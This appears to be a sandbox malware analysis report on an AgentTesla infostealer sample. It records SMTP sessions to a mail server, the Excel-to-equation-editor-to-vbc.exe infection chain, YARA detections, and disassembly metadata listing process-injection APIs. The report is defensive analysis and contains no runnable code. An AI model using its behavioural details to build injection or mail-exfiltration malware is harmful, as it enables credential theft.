Jan 13, 2021 20:43:34.836627007 CET	587	49168	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:43:34 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:43:34.837357044 CET	49168	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:43:34.916750908 CET	587	49168	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:43:34.917283058 CET	49168	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:43:34.998734951 CET	587	49168	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:43:36.509646893 CET	587	49168	217.174.152.38	192.168.2.22	421 honey.vivawebhost.com lost input connection
Jan 13, 2021 20:43:47.893498898 CET	587	49171	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:43:47 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:43:47.893995047 CET	49171	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:43:47.975651026 CET	587	49171	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:43:47.976128101 CET	49171	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:43:48.060558081 CET	587	49171	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:44:00.074893951 CET	587	49172	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:44:00 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:44:00.075277090 CET	49172	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:44:00.156693935 CET	587	49172	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:44:00.157043934 CET	49172	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:44:00.241065025 CET	587	49172	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:44:11.366298914 CET	587	49173	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:44:11 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:44:11.366606951 CET	49173	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:44:11.448107958 CET	587	49173	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:44:11.448534012 CET	49173	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:44:11.532612085 CET	587	49173	217.174.152.38	192.168.2.22	220 TLS go ahead
Jan 13, 2021 20:44:22.406984091 CET	587	49174	217.174.152.38	192.168.2.22	220-honey.vivawebhost.com ESMTP Exim 4.93 #2 Wed, 13 Jan 2021 21:44:22 +0200 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 13, 2021 20:44:22.407346010 CET	49174	587	192.168.2.22	217.174.152.38	EHLO 899552
Jan 13, 2021 20:44:22.486284971 CET	587	49174	217.174.152.38	192.168.2.22	250-honey.vivawebhost.com Hello 899552 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Jan 13, 2021 20:44:22.486655951 CET	49174	587	192.168.2.22	217.174.152.38	STARTTLS
Jan 13, 2021 20:44:22.568134069 CET	587	49174	217.174.152.38	192.168.2.22	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1532 Parent PID: 584

General

Start time:	20:41:47
Start date:	13/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa90000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2528 Parent PID: 584

General

Start time:	20:42:07
Start date:	13/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2688 Parent PID: 2528

General

Start time:	20:42:09
Start date:	13/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x1310000
File size:	812032 bytes
MD5 hash:	72B76DB11728DD92AA4C3CB45F155B05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 960 Parent PID: 2688

General

Start time:	20:42:13
Start date:	13/01/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x1310000
File size:	812032 bytes
MD5 hash:	72B76DB11728DD92AA4C3CB45F155B05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2688 Parent PID: 2528 vbc.exeCOMMON

Executed Functions

Function 003200E8, Relevance: 10.5, Strings: 7, Instructions: 1730COMMON

Download Yara Rule

Strings

TNJl, xrefs: 003213B6
p},, xrefs: 003200E8
TNJl, xrefs: 003215C7
TNJl, xrefs: 003211E2
TNJl, xrefs: 00320F52
TNJl, xrefs: 00320A73
TNJl, xrefs: 003217D8

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: TNJl$TNJl$TNJl$TNJl$TNJl$TNJl$p},
API String ID: 0-2627638584
Opcode ID: d1282c06fe6d69dc10e32f5fa42110fa0c850e6b01d2a6c9d33f53b0cf2437ff
Instruction ID: a33123c42de59d89ffe15740175735dbbe1cb40b8964b22ae52afe7880552755
Opcode Fuzzy Hash: d1282c06fe6d69dc10e32f5fa42110fa0c850e6b01d2a6c9d33f53b0cf2437ff
Instruction Fuzzy Hash: 8003D334A11618CFDB25DF64C898E9DB7B5BF8A304F1146E9E4096B361DB31AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01146C78, Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

u, xrefs: 01146F37
v, xrefs: 01146CE6

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID: u$v
API String ID: 0-3858056710
Opcode ID: f39ec7617667a6af7f3f332da41fccb264f639fe7a2738642b8d7e4cba929bb3
Instruction ID: 7ff6a430f6af72dc7fac49890f77e62ea10444dffee94f6a0fcebb42024e6f3b
Opcode Fuzzy Hash: f39ec7617667a6af7f3f332da41fccb264f639fe7a2738642b8d7e4cba929bb3
Instruction Fuzzy Hash: 92C15A74C09228CFDB2CCF69C8447EDBAB5BB8A719F0191AAC10AB3291D7340AC5CF05

Uniqueness

Uniqueness Score: -1.00%

Function 00324598, Relevance: 2.3, Strings: 1, Instructions: 1042COMMON

Download Yara Rule

Strings

TVGm, xrefs: 0032473D

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: TVGm
API String ID: 0-2166477260
Opcode ID: a7aa0f0f923bad72d7211aee2f508b161eafdd3049edf80976eef1c3bc15b768
Instruction ID: db73af75b6d5d4e6ba9e66d176e2af2479aa718b9c821bea1d8be0c5bcb0a5a3
Opcode Fuzzy Hash: a7aa0f0f923bad72d7211aee2f508b161eafdd3049edf80976eef1c3bc15b768
Instruction Fuzzy Hash: 74B2D275A00628CFDB65CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00328BEA, Relevance: 1.7, Strings: 1, Instructions: 474COMMON

Download Yara Rule

Strings

TVGm, xrefs: 00328C15

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: TVGm
API String ID: 0-2166477260
Opcode ID: c3779bf9ab64066dc75a7c4cfbf439567c92313b43214e157b95c7d2069745ab
Instruction ID: bb8201c709dcd61d40d1d8811449930466c4d10a42a8a0d3d7e49094da2510df
Opcode Fuzzy Hash: c3779bf9ab64066dc75a7c4cfbf439567c92313b43214e157b95c7d2069745ab
Instruction Fuzzy Hash: C922D274905228CFDB65CF64D948BEDBBB5BF49304F2180AAD50AAB361DB709E85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01147138, Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

u, xrefs: 01146F37

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID:
String ID: u
API String ID: 0-4067256894
Opcode ID: d99ef9950d80dc18024c0336e11dbb5eb5dade946bf8114e02b0571cf908ba01
Instruction ID: 90c723f398865f694f4f7542b4aa11ee61fc864c276733605554e1aab3159a79
Opcode Fuzzy Hash: d99ef9950d80dc18024c0336e11dbb5eb5dade946bf8114e02b0571cf908ba01
Instruction Fuzzy Hash: 86A14874C0A229CFDB2CCF69D8447ECBAB5BB8A715F0091AAD149B3290D7340AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0032ADA6, Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

p}n, xrefs: 0032AE0F

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: p}n
API String ID: 0-2603350694
Opcode ID: 9f81a9a40a680dc85c24e9aaf4f10bea6036075b38667c1924c92b277843a512
Instruction ID: 4341e5ee6b6ca7901592710f24b7b02146cf49028cfbf96e738f7de1582a35f6
Opcode Fuzzy Hash: 9f81a9a40a680dc85c24e9aaf4f10bea6036075b38667c1924c92b277843a512
Instruction Fuzzy Hash: EA21B27481C3C5AFCB12DBB8C4505EABFF0AF8B300B1955DAD4D49B262C6341A02EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00322528, Relevance: .9, Instructions: 912COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08af0d1f6f750228d58b474546521c4de1a6f3d91184c0963ea4d7c2ea1da41
Instruction ID: 3ce6f57698a9207c2f9b9a4e38a1e7fb318c7554d8dcb7de38b0299a2c10dff7
Opcode Fuzzy Hash: a08af0d1f6f750228d58b474546521c4de1a6f3d91184c0963ea4d7c2ea1da41
Instruction Fuzzy Hash: 5292F4B1C04269CFEB25CFAAD9483EDBAF9FB48305F1480A9D019A7691D7794AC5DF00

Uniqueness

Uniqueness Score: -1.00%

Function 00322518, Relevance: .5, Instructions: 525COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf9531a09b7cc5b99faf89227893799c42feccf5802ed789f2547b1fe892088
Instruction ID: d54af1ba622253073a7e3a5c8d3cd832cba98c8a6f39b8712f9dcf02c783add2
Opcode Fuzzy Hash: aaf9531a09b7cc5b99faf89227893799c42feccf5802ed789f2547b1fe892088
Instruction Fuzzy Hash: 94320871C04268CFEB29CFA6D8583EDBAF5BF48345F1480A9D009AB691D7794AC9DF40

Uniqueness

Uniqueness Score: -1.00%

Function 0032B544, Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02dc0f3835d268c5903d07b42d05e885b59c88b29a6deb06656bdb1061eff444
Instruction ID: 9ca93bbc83d50de4983c383dec099874f5600c0a6d9412380b372433cb204c2e
Opcode Fuzzy Hash: 02dc0f3835d268c5903d07b42d05e885b59c88b29a6deb06656bdb1061eff444
Instruction Fuzzy Hash: 3CA11A78A04119CFCB15CFA9E4809ADB7FAFF89310B249169E80AEB755D734D942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00323551, Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8fd400609fad941dbf9b9eb8756d2117953283e419d56d6266cd60c082057c
Instruction ID: 890a0a1cb5a1e0e92b436754e29c69337584d9fa17217bdeaf852dd6344f1c9e
Opcode Fuzzy Hash: bd8fd400609fad941dbf9b9eb8756d2117953283e419d56d6266cd60c082057c
Instruction Fuzzy Hash: D261CFB5D052189FDB14CFAAD888BEDBBF2AF89300F24912AE405BB364D7745A45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003276F0, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb74792a9e1b152f2354dd345a2bed10e27ea52864215550756eb64cd78405e6
Instruction ID: 2c211932e26b1f585048a60adc15d3d9da2125ff78da569c1354379461fdaecc
Opcode Fuzzy Hash: fb74792a9e1b152f2354dd345a2bed10e27ea52864215550756eb64cd78405e6
Instruction Fuzzy Hash: 8A314F75D0E3858FDB16CF7A98546D9BFB6AFC6200F09C4ABC444AB263D7340905CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00327738, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f67a6fe2056a5bceb6085c313c36ba80c1e31cbe678a046ea3770311da394bc
Instruction ID: bdc05a403b2e1b5d387f723c66c179081a498d27f91b00e203af6ca401bc224b
Opcode Fuzzy Hash: 3f67a6fe2056a5bceb6085c313c36ba80c1e31cbe678a046ea3770311da394bc
Instruction Fuzzy Hash: A011F871D056199BEB08CFABD8046EEFBFBBFC9300F14C5798918A6264EB3006419F51

Uniqueness

Uniqueness Score: -1.00%

Function 00325830, Relevance: 2.6, Strings: 2, Instructions: 100COMMON

Download Yara Rule

Strings

PSJl, xrefs: 003258BD
PSJl, xrefs: 003258CD

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: PSJl$PSJl
API String ID: 0-261871768
Opcode ID: 6ff2eaa634b1928efcae142d84e4f4f662ea169af1c21396e469533b7e84e1e1
Instruction ID: e162ac2de06c970a92e08cfcedc337c733a01444f536faf7dedbe81a36e4e9fe
Opcode Fuzzy Hash: 6ff2eaa634b1928efcae142d84e4f4f662ea169af1c21396e469533b7e84e1e1
Instruction Fuzzy Hash: AB410674E05228DFCB05DFA8E448AEEB7F6EB88311F208029E406A7754DB745E41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01149A00, Relevance: 1.7, APIs: 1, Instructions: 222processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01149BDC

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: debd32f64bfa1c88e02cb8f6168737b117ee785a7b53960503b175184b890cb6
Instruction ID: df6502bb03b170e5266c1828a7231866e80ca935687ee6b9ad0274cc04b2e8ac
Opcode Fuzzy Hash: debd32f64bfa1c88e02cb8f6168737b117ee785a7b53960503b175184b890cb6
Instruction Fuzzy Hash: DB81BF74D0026D9FDF24CFA9C840BEEBBB6BB49304F1095AAE548B7250DB309A85DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0114A480, Relevance: 1.6, APIs: 1, Instructions: 112injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0114A556

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 823fb7589c3d66a37fb92fac7a698a0b16dc90313135da4a47987844db2afc8b
Instruction ID: 26bac6b52af0bffcf7657d5e410e7db208b1e73a9e6cff5b44faa8b7925c79b1
Opcode Fuzzy Hash: 823fb7589c3d66a37fb92fac7a698a0b16dc90313135da4a47987844db2afc8b
Instruction Fuzzy Hash: CB4189B5D002589FCF04CFA9D984ADEFBF1BB49310F24942AE818BB210D334AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01149E48, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01149EFD

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 22e58ed4667df255716b74f5eb80c9e8e26124feae4ff8b929a03ead0e09e00a
Instruction ID: de6f6d6e7147d8471f76d059ccaf460c5be78417746ba88bb81ea312d80799b9
Opcode Fuzzy Hash: 22e58ed4667df255716b74f5eb80c9e8e26124feae4ff8b929a03ead0e09e00a
Instruction Fuzzy Hash: 444198B9D04258DFCF10CFAAD884ADEFBB1BB09314F14902AE814B7210D335AA45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0114A370, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0114A41D

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 099936eda30e2c91b079a5df25b9c2cd806d917c633e4c7f6d2bc698dce06de1
Instruction ID: 479b020d4ffd287749d86f5e2c43f41adeaf29bab1939fdb631259d4c3052efb
Opcode Fuzzy Hash: 099936eda30e2c91b079a5df25b9c2cd806d917c633e4c7f6d2bc698dce06de1
Instruction Fuzzy Hash: 5D3167B8D042589FCF14CFA9E884ADEFBB5BB59310F14902AE915B7310D335A905CF65

Uniqueness

Uniqueness Score: -1.00%

Function 01149D30, Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 01149DE2

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b757d245022903854b242832517ea8ce6bad85bf44e592c37fa190890bf01a66
Instruction ID: 124b32e4b187b6b40b7126c7735f62426c121c7d35ab17ee7cc01163d9ca36fe
Opcode Fuzzy Hash: b757d245022903854b242832517ea8ce6bad85bf44e592c37fa190890bf01a66
Instruction Fuzzy Hash: C13189B4D012589FDF14CFA9D884AEEFBF1BB49314F24842AE418B7210D778AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0114A5C8, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0114A646

Memory Dump Source

Source File: 00000004.00000002.2159040535.0000000001140000.00000040.00000001.sdmp, Offset: 01140000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 39d3dd1c4c9cca69b3c985c40ffe67266cf42fdbbb92cb493941e260778547b6
Instruction ID: f16484f6a36e4a8bf690bda92805c4a6a8a74d3e967ecbedccc5c04db6d52c11
Opcode Fuzzy Hash: 39d3dd1c4c9cca69b3c985c40ffe67266cf42fdbbb92cb493941e260778547b6
Instruction Fuzzy Hash: E92199B8D102089FCB14CFA9E484ADEFBF4AB49314F24941AE819B3310D335A941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00325828, Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

PSJl, xrefs: 003258BD

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: PSJl
API String ID: 0-3391212203
Opcode ID: f6edac800a2a5b0fbfa40d453ccde34847bd0e548eff0f2d2916ec01c83a9233
Instruction ID: d9b84a182b89ec98725fd93c5e5803c972acd5a21e3c94aef31386bc8cbd93a1
Opcode Fuzzy Hash: f6edac800a2a5b0fbfa40d453ccde34847bd0e548eff0f2d2916ec01c83a9233
Instruction Fuzzy Hash: AD410474E05628DFDB05DFA8E848AEEBBF6FB88301F108029E506A7654DB745E41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0032ADF8, Relevance: 1.3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

Strings

p}n, xrefs: 0032AE0F

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: p}n
API String ID: 0-2603350694
Opcode ID: 67b88b15e1640e372230dea819fdcc94aaf5dc7f785a81f6a3be59d014c57481
Instruction ID: a9a203cbc6d9dc02c09cf4d54e05e8de693c0b71ba3922d604708085654ed41f
Opcode Fuzzy Hash: 67b88b15e1640e372230dea819fdcc94aaf5dc7f785a81f6a3be59d014c57481
Instruction Fuzzy Hash: C6019274D182099FCB54EFE8D844AAEFBB1FF88305F5086A9D919A7350EB705A01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00320188, Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

|},, xrefs: 00320188

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID: |},
API String ID: 0-182657918
Opcode ID: 7cb3e3edf29ea0578db32a2c78ee75c05419c39cc2a191dda5f0cd776be84382
Instruction ID: b1fad4c05b03e818853d6fd9bbffc3658d93fb771673a4d454f03c4782a7d06f
Opcode Fuzzy Hash: 7cb3e3edf29ea0578db32a2c78ee75c05419c39cc2a191dda5f0cd776be84382
Instruction Fuzzy Hash: 7DD0A730469209AFC6007BE57C1CA7B76ACDF06707F001D5CA80D52110CB714800D562

Uniqueness

Uniqueness Score: -1.00%

Function 0032A0B7, Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1351b84cb3b9d30488c0684767df0fa164fce10e1d661843345b11698c4cd575
Instruction ID: 5cdb38e75d8a77bb904c16bd8035dbfe2f23ed890cdb27118caa815c9de5b7e3
Opcode Fuzzy Hash: 1351b84cb3b9d30488c0684767df0fa164fce10e1d661843345b11698c4cd575
Instruction Fuzzy Hash: 4C1279748016A4CFE705EFC8E188A9CBBFAFB88309F5AC558D5055F256C3789885CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00329FF3, Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e06aa26f365d07551bdbaf0bc296ae869260f81813428ba42fe455dd8e28c23
Instruction ID: 0053084431eb88cbf582d7427fa08ff5e137b2cfd1282792b6c2100858b7cf5b
Opcode Fuzzy Hash: 3e06aa26f365d07551bdbaf0bc296ae869260f81813428ba42fe455dd8e28c23
Instruction Fuzzy Hash: 58C15778801669CFEB01DFC8E184A9DFBFAFB88314F56C158D5059B656C3389885CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0032A048, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcdfc40779d7716f7f318ac14bc93b34ef5c147a15ff159133ab84028ffe7760
Instruction ID: da27a5f0c2ce1f398d7349bc71419a240260874fb0606bbae23e276e886d555d
Opcode Fuzzy Hash: fcdfc40779d7716f7f318ac14bc93b34ef5c147a15ff159133ab84028ffe7760
Instruction Fuzzy Hash: 77C15678801669CFEB01DFC8E184A9DFBFAFB88314F56C158E5059B656C3389885CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0032A058, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7787be8df501db0b65c85da1418b15f3bdd5b1722aec60cbb63f0c11af48e2a9
Instruction ID: aba66614ba7e3394b84a5bd2b626fb8d9b1b9ba2cac69da00b699210ec9a86e6
Opcode Fuzzy Hash: 7787be8df501db0b65c85da1418b15f3bdd5b1722aec60cbb63f0c11af48e2a9
Instruction Fuzzy Hash: 34C15678801665CFEB01EFC8E184A9DFBFAFB88318F56C158E5059B256C3389885CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0032A077, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9ceebb9f4eba432c4e1198f6da6d268cb9fd2cbe5022de9e29672a69de8259
Instruction ID: 116f7cf0db7318c627bc6e1e27b55d7af289e570592ff0c464c3eaeb9ef683fd
Opcode Fuzzy Hash: 4d9ceebb9f4eba432c4e1198f6da6d268cb9fd2cbe5022de9e29672a69de8259
Instruction Fuzzy Hash: 40C14678801669CFEB05DFC8E184A9DFBFAFB88314F56C158E505AB256C3389885CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00326BEB, Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f335435b3ddf472d4b6b4002f4cbdfd4d808c77017bf348416f00d21b33666e5
Instruction ID: fb414aeb8963b4f4347c3972ed81b669b7a2e2f6f6ef00fca36d34b09f3d714c
Opcode Fuzzy Hash: f335435b3ddf472d4b6b4002f4cbdfd4d808c77017bf348416f00d21b33666e5
Instruction Fuzzy Hash: A9A1C274E0522CCFDB61EFA8E985B9DBBB5FF49300F2084A9D409AB241DB345A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0032B575, Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2158403551.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 956108a67e239f888f694a24d29f56bdc21c214fda18e283719bc0cf6cdab435
Instruction ID: 4e1e8628969964bdc3a7709e205ed3ded7c9930c585abe3d93a3b0137c12433c
